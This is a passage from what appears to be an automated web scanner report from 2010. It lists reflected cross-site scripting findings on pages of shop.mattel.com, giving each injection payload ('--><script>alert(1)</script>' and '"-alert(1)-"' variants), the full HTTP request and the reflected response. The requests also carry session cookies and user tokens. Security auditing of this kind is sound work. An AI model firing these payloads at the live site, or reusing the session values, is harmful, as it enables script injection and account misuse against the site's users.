Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /emailSignup/index.jsp?62aed--><script>alert(1)</script>19aa858cf=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:50 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50783


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<!-- === Request Query String: 62aed--><script>alert(1)</script>19aa858cf=1 -->
...[SNIP]...

1.16. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 130c3"-alert(1)-"e1a4d627d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /emailSignup/index.jsp?130c3"-alert(1)-"e1a4d627d26=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50741


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="130c3"-alert(1)-"e1a4d627d26=1";
   </script>
...[SNIP]...

1.17. http://shop.mattel.com/family/index.jsp [cp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59b7b"-alert(1)-"9499bf6d796 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /family/index.jsp?categoryId=3812552&cp=381231759b7b"-alert(1)-"9499bf6d796 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:13:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a52184540545157570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:01 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73296


                                                                                                                            <!DOCTYPE html PUB
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=3812552&cp=381231759b7b"-alert(1)-"9499bf6d796";
   </script>
...[SNIP]...

1.18. http://shop.mattel.com/family/index.jsp [cp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the cp request parameter is copied into an HTML comment. The payload 51834--><script>alert(1)</script>f36fc4cd686 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /family/index.jsp?categoryId=3812552&cp=381231751834--><script>alert(1)</script>f36fc4cd686 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:13:55 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a52184540545157570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:03 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73728


                                                                                                                            <!DOCTYPE html PUB
...[SNIP]...
<!-- === Request Query String: categoryId=3812552&cp=381231751834--><script>alert(1)</script>f36fc4cd686 -->
...[SNIP]...

1.19. http://shop.mattel.com/family/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77aaf"%3balert(1)//1f834e93093 was submitted in the jsessionid parameter. This input was echoed as 77aaf";alert(1)//1f834e93093 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /family/index.jsp;jsessionid=77aaf"%3balert(1)//1f834e93093 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=77aaf";alert(1)//1f834e93093";
   </script>
...[SNIP]...

1.20. http://shop.mattel.com/family/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 320da--><script>alert(1)</script>34133063b89 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /family/index.jsp;jsessionid=320da--><script>alert(1)</script>34133063b89 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:46 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37536


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<!-- === Request Query String: jsessionid=320da--><script>alert(1)</script>34133063b89 -->
...[SNIP]...

1.21. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c93c--><script>alert(1)</script>4ed9c217b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /family/index.jsp?9c93c--><script>alert(1)</script>4ed9c217b51=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:43 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:50 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<!-- === Request Query String: 9c93c--><script>alert(1)</script>4ed9c217b51=1 -->
...[SNIP]...

1.22. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab71"-alert(1)-"9445a5148d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /family/index.jsp?fab71"-alert(1)-"9445a5148d9=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:47 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="fab71"-alert(1)-"9445a5148d9=1";
   </script>
...[SNIP]...

1.23. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d072a"-alert(1)-"13ed71b93db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /giftCertificates/index.jsp?d072a"-alert(1)-"13ed71b93db=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:46 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43535


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="productId=3738867&d072a"-alert(1)-"13ed71b93db=1";
   </script>
...[SNIP]...

1.24. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7abdc--><script>alert(1)</script>ca2770aa469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /giftCertificates/index.jsp?7abdc--><script>alert(1)</script>ca2770aa469=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:52 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43591


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- === Request Query String: productId=3738867&7abdc--><script>alert(1)</script>ca2770aa469=1 -->
...[SNIP]...

1.25. http://shop.mattel.com/helpdesk/index.jsp [display parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the display request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11184"-alert(1)-"137cfc99da6 was submitted in the display parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp?display=store11184"-alert(1)-"137cfc99da6&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
